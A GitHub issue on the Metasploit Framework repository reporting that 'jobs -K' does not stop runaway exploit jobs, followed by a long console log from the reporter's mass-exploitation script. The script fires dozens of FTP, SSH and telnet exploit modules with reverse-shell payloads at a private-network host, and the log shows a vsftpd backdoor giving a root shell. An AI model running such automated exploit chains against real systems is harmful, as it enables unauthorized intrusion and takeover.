rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.89k stars 13.93k forks source link

Runaway jobs can't be killed with jobs -K #14257

Open oxagast opened 3 years ago

oxagast commented 3 years ago

Steps to reproduce

Have multiple running exploits in parallel, then try to kill 'runaway' exploits with jobs -K and it doesn't seem to kill the runaway jobs. Running jobs -k <jobnumber> seems to work though.

Found this bug via a script I'm writing to make metasploit more autonomous.

Were you following a specific guide/tutorial or reading documentation?

No particular guide was followed except that jobs -h shows that this should work, and doesn't work as expected.

Expected behavior

All currently running exploit jobs should stop.

Current behavior

Some runaway jobs keep running.

Metasploit version

Framework: 6.0.11-dev-1b6879cc6b Console : 6.0.11-dev-1b6879cc6b

adfoster-r7 commented 3 years ago

@oxagast I wasn't able to reproduce this error, do you have replication steps? What sort of jobs were being created?

oxagast commented 3 years ago

Exploit module jobs. I have a script that creates a ton of exploit jobs in a .rc script. As you can see in the log, the jobs start and run, then I type jobs -K and the jobs don't stop. If I type jobs -k 3 for example, it will kill the 3rd job, but I have to iterate through them manually and kill a couple of them off that keep going. For reference the .rc script says jobs -K as well. Log:

[marshall@jinkon.maskster.site]{12:08 PM}: [~/Hack/Tools/metasploit-framework] $ ./autopreter.pl 10.0.1.6 10.0.1.4
autopreter by oxagast
trying to spawn a shell from 10.0.1.6...

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v6.0.11-dev-1b6879cc6b               ]
+ -- --=[ 2068 exploits - 1122 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use the resource command to run commands from a file

[*] Processing masspwn.2974202.msf for ERB directives.
resource (masspwn.2974202.msf)> use exploits/multi/ftp/pureftpd_bash_env_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2000
LPORT => 2000
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/ftp/wuftpd_site_exec_format
[*] Started reverse TCP handler on 10.0.1.4:2000
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2001
LPORT => 2001
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/ftp/proftp_telnet_iac
[*] Started reverse TCP handler on 10.0.1.4:2001
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2002
LPORT => 2002
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] 10.0.1.6:21 - Automatically detecting the target...
[-] 10.0.1.6:21 - Exploit aborted due to failure: no-target: No matching target
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/mainframe/ftp/ftp_jcl_creds
[*] Started reverse TCP handler on 10.0.1.4:2002
[*] No payload configured, defaulting to generic/shell_reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2003
LPORT => 2003
resource (masspwn.2974202.msf)> set ExitOnSession false
[*] 10.0.1.6:21 - Automatically detecting the target...
ExitOnSession => false
[-] 10.0.1.6:21 - Exploit aborted due to failure: no-target: No matching target
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/ftp/vsftpd_234_backdoor
[*] Started reverse TCP handler on 10.0.1.4:2003
[*] No payload configured, defaulting to cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2004
[+] 10.0.1.6:21 - Successfully connected to FTP server.
LPORT => 2004
resource (masspwn.2974202.msf)> set ExitOnSession false
[+] 10.0.1.6:21 - Successfully switched to JES mode
[*] 10.0.1.6:21 - Uploading JCL file: XSMSUEBG
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] 10.0.1.6:21 - Exploit aborted due to failure: unexpected-reply: 10.0.1.6:21 - Failed to upload JCL to FTP server
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/ftp/ms09_053_ftpd_nlst
[*] 10.0.1.6:21 - Command Stager progress -  60.53% done (500/826 bytes)
[*] 10.0.1.6:21 - Banner: 220 (vsFTPd 2.3.4)
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
[*] 10.0.1.6:21 - USER: 331 Please specify the password.
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2005
[+] 10.0.1.6:21 - Backdoor service has been spawned, handling...
LPORT => 2005
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[+] 10.0.1.6:21 - UID: uid=0(root) gid=0(root)
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 5.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/ftp/sami_ftpd_user
[*] Started reverse TCP handler on 10.0.1.4:2005
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2006
[*] 10.0.1.6:21 - 550 Create directory operation failed.
[-] 10.0.1.6:21 - The root directory of the FTP server is not writeable
LPORT => 2006
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] 10.0.1.6:21 - Exploit failed: windows/meterpreter/reverse_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/ftp/httpdx_tolog_format
[*] 10.0.1.6:21 - Command Stager progress - 100.61% done (831/826 bytes)
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2007
LPORT => 2007
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 6.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/ftp/dreamftp_format
[*] Started reverse TCP handler on 10.0.1.4:2007
[*] 10.0.1.6:21 - Automatically detecting the target...
[*] 10.0.1.6:21 - No matching target
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2008
LPORT => 2008
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 7.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/ftp/comsnd_ftpd_fmtstr
[*] Started reverse TCP handler on 10.0.1.4:2008
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2009
LPORT => 2009
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 8.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/ftp/ability_server_stor
[*] Started reverse TCP handler on 10.0.1.4:2009
[*] 10.0.1.6:21 - Triggering overflow...
[*] Found shell.
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2010
LPORT => 2010
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Command shell session 1 opened (0.0.0.0:0 -> 10.0.1.6:6200) at 2020-10-14 12:09:04 -0400
[*] Exploit running as background job 9.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/ftp/vermillion_ftpd_port
[*] Started reverse TCP handler on 10.0.1.4:2010
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2011
LPORT => 2011
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 10.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/freebsd/ftp/proftp_telnet_iac
[*] Started reverse TCP handler on 10.0.1.4:2011
[*] 10.0.1.6:21 - Automatically detecting the target...
[*] No payload configured, defaulting to bsd/x86/shell/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2012
LPORT => 2012
resource (masspwn.2974202.msf)> set ExitOnSession false
[*] 10.0.1.6:21 - No matching target
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 11.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/ssh/sshexec
[*] Started reverse TCP handler on 10.0.1.4:2012
[*] 10.0.1.6:21 - Automatically detecting the target...
[-] 10.0.1.6:21 - Exploit aborted due to failure: no-target: No matching target
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2013
LPORT => 2013
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 12.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/ssh/cisco_ucs_scpuser
[*] Started reverse TCP handler on 10.0.1.4:2013
[*] No payload configured, defaulting to cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2014
LPORT => 2014
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 13.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/ssh/vmware_vdp_known_privkey
[*] Using configured payload cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2015
LPORT => 2015
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] 10.0.1.6:22 - Attempt to login to the Cisco appliance...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 14.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey
[*] Using configured payload cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2016
LPORT => 2016
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 15.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/ssh/vyos_restricted_shell_privesc
[*] Using configured payload cmd/unix/reverse_bash
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2017
LPORT => 2017
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] Exploit aborted due to failure: no-access: Failed authentication
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 16.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/ssh/ceragon_fibeair_known_privkey
[*] Using configured payload cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2018
LPORT => 2018
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] Started reverse TCP handler on 10.0.1.4:2017
[*] 10.0.1.6:22 - Attempt to login to VyOS SSH ...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 17.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/ssh/exagrid_known_privkey
[*] Using configured payload cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2019
LPORT => 2019
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] 10.0.1.6:22 SSH - Failed authentication
[-] 10.0.1.6:22 SSH - Failed authentication
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 18.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/ssh/f5_bigip_known_privkey
[*] Using configured payload cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2020
LPORT => 2020
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 19.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/ssh/quantum_dxi_known_privkey
[*] Using configured payload cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2021
LPORT => 2021
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 20.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/ssh/ibm_drm_a3user
[*] No payload configured, defaulting to cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2022
LPORT => 2022
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 21.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/ssh/mercurial_ssh_exec
[*] Using configured payload python/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2023
LPORT => 2023
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] 10.0.1.6:22 - Attempting to log in to the IBM Data Risk Manager appliance...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] Exploit failed: One or more options failed to validate: SSH_PRIV_KEY_FILE.
[-] 10.0.1.6:22 SSH - Failed authentication
[-] 10.0.1.6:22 SSH - Failed authentication
[-] 10.0.1.6:22 SSH - Failed authentication
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/ssh/quantum_vmpro_backdoor
[-] 10.0.1.6:22 SSH - Failed authentication
[*] No payload configured, defaulting to cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2024
LPORT => 2024
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 22.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/ssh/symantec_smg_ssh
[*] 10.0.1.6:22 - Attempt to login...
[*] No payload configured, defaulting to cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2025
LPORT => 2025
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 23.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/ssh/tectia_passwd_changereq
[*] 10.0.1.6:22 - Attempt to login...
[*] No payload configured, defaulting to cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2026
LPORT => 2026
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 24.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/ssh/arista_tacplus_shell
[*] Using configured payload linux/x86/shell_reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2027
LPORT => 2027
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 25.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/ssh/array_vxag_vapv_privkey_privesc
[*] Started reverse TCP handler on 10.0.1.4:2027
[*] 10.0.1.6:22 - Attempt to login to the Arista's restricted shell...
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2028
LPORT => 2028
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/ssh/freesshd_key_exchange
[*] 10.0.1.6:22 - 10.0.1.6:22 - Sending USERAUTH Change request...
[-] Exploit aborted due to failure: no-access: 10.0.1.6:22 SSH - Failed authentication
[*] 10.0.1.6:22 - 10.0.1.6:22 - Auths that can continue: 51
[-] 10.0.1.6:22 SSH - Failed authentication
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2029
[-] Exploit aborted due to failure: no-access: 10.0.1.6:22 SSH - Authentication failed
LPORT => 2029
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 26.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/ssh/freesshd_authbypass
[*] Started reverse TCP handler on 10.0.1.4:2029
[*] 10.0.1.6:22 - Not running a vulnerable version...
[-] Exploit aborted due to failure: unknown: 10.0.1.6:22 SSH - Failed authentication
[-] 10.0.1.6:22 SSH - Failed authentication
[-] 10.0.1.6:22 SSH - Failed authentication
[-] 10.0.1.6:22 SSH - Failed authentication
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2030
LPORT => 2030
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 27.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/ssh/freeftpd_key_exchange
[*] Started reverse TCP handler on 10.0.1.4:2030
[-] 10.0.1.6:22 - Exploit aborted due to failure: not-vulnerable: Target is most likely not vulnerable!
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2031
LPORT => 2031
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 28.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/apple_ios/ssh/cydia_default_ssh
[*] Started reverse TCP handler on 10.0.1.4:2031
[*] No payload configured, defaulting to cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
[*] 10.0.1.6:22 - Not running a vulnerable version...
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2032
LPORT => 2032
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 29.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/solaris/telnet/fuser
[*] 10.0.1.6:22 - Attempt to login as 'root' with password 'alpine'
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2033
LPORT => 2033
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] 10.0.1.6:23 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/solaris/telnet/ttyprompt
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2034
LPORT => 2034
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] 10.0.1.6:23 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/telnet/netgear_telnetenable
[*] No payload configured, defaulting to cmd/unix/interact
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2035
LPORT => 2035
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
